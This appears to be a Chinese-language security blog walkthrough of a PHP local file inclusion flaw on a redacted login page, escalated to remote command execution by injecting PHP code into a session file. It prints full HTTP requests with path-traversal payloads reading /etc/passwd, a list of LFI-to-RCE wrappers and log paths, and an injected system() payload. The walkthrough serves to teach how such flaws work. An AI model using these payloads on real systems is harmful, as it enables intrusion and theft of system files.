个简单的文件包含:
|
1 2 3 4 5 6 7 8 9 10 11 |
POST /upload/? HTTP/1.1 Host: vulnerable.redacted.com User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 44 Connection: close Upgrade-Insecure-Requests: 1
login=1&user=admin&pass=admin&lang=en_us.php |
有的登录页面,会有个参数来指定语言,比如以上的lang参数。
|
1 2 3 4 5 6 7 8 9 10 11 |
POST /upload/? HTTP/1.1 Host: vulnerable.redacted.com User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 75 Connection: close Upgrade-Insecure-Requests: 1
login=1&user=admin&pass=admin&lang=../../../../../../../../../../etc/passwd |
通过不断的尝试遍历跳目录,成功包含/etc/passwd,在返回包可以看到内容。
从LFI升级到RCE的一些常见方法
一般找到了本地文件包含之后,可以尝试转换一波远程命令执行。
可能有以下技巧:
-
使用文件上传表单/函数
-
expect://cmd
-
php://file
-
php://filter
-
input://stream
-
data://text/plain;base64,command
-
/proc/self/environ
-
/proc/self/fd
-
一些可控的日志文件,如:
-
/var/log/apache/access.log
-
/var/log/apache/error.log
-
/var/log/vsftpd.log
-
/var/log/sshd.log
-
/var/log/mail
也可能会失败。
通过控制PHP Session实现RCE
这个程序当输入错误的账号密码比如admin登录失败之后
返回了几个Set-Cookie,请求中包含php session的值可能存储在服务器端。
Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly
Set-Cookie: pass=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly
PHP5存储session文件,默认位置是/var/lib/php5/sess_[PHPSESSID]
所以以上session应该存储在
/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27
所以先包含会话文件试一波
|
1 2 3 4 5 6 7 8 9 10 11 12 |
POST /upload/? HTTP/1.1 Host: vulnerable.redacted.com User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27 Content-Length: 107 Connection: close Upgrade-Insecure-Requests: 1
login=1&user=admin&pass=admin&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27 |
返回
user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";
很明显,我们在user参数处输入php代码。
|
1 2 3 4 5 6 7 8 9 10 11 12 |
POST /upload/? HTTP/1.1 Host: vulnerable.redacted.com User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27 Content-Length: 134 Connection: close Upgrade-Insecure-Requests: 1
login=1&user=<?php system("cat /etc/passwd");?>&pass=password&lang=en_us.php |
结果,内容写入了set-cookie,也写入了session文件
Set-Cookie:user=%3C%3Fphp+system%28%22cat+%2Fetc%2Fpasswd%22%29%3B%3F%3E;expires=Mon, 13-Aug-2018 20:40:53 GMT; path=/; httponly
session文件再用LFI可读取。注意,需要从请求中删除cookie,否则会被覆盖,导致读取失败。
|
1 2 3 4 5 6 7 8 9 10 11 |
POST /upload/? HTTP/1.1 Host: vulnerable.redacted.com User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 141 Connection: close Upgrade-Insecure-Requests: 1
login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27 |
导致命令执行。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论